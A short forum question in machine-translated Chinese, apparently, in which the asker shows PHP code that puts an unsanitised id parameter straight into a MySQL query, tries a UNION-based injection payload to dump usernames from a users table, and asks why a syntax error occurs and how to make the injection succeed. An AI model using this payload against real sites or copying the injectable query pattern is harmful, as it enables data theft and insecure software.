我有这段代码:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
并且网址将如下:
site.com/aa/?id=1
所以我尝试添加这个值:
site.com/aa/?id=-1 union select 1,group_concat(username),3来自用户AND 1 = 1
所以查询将如下:
-1 union select 1,group_concat(username),3 from users and 1=1 LIMIT 0,1
当我尝试将代码放在上面时,我面临着sql错误:
您的SQL语法有错误;检查与您的MySQL服务器版本对应的手册,以便在' AND 1 = 1 LIMIT 0,1'附近使用正确的语法。在第1行
为什么?以及如何在没有错误的情况下使用sql-injection?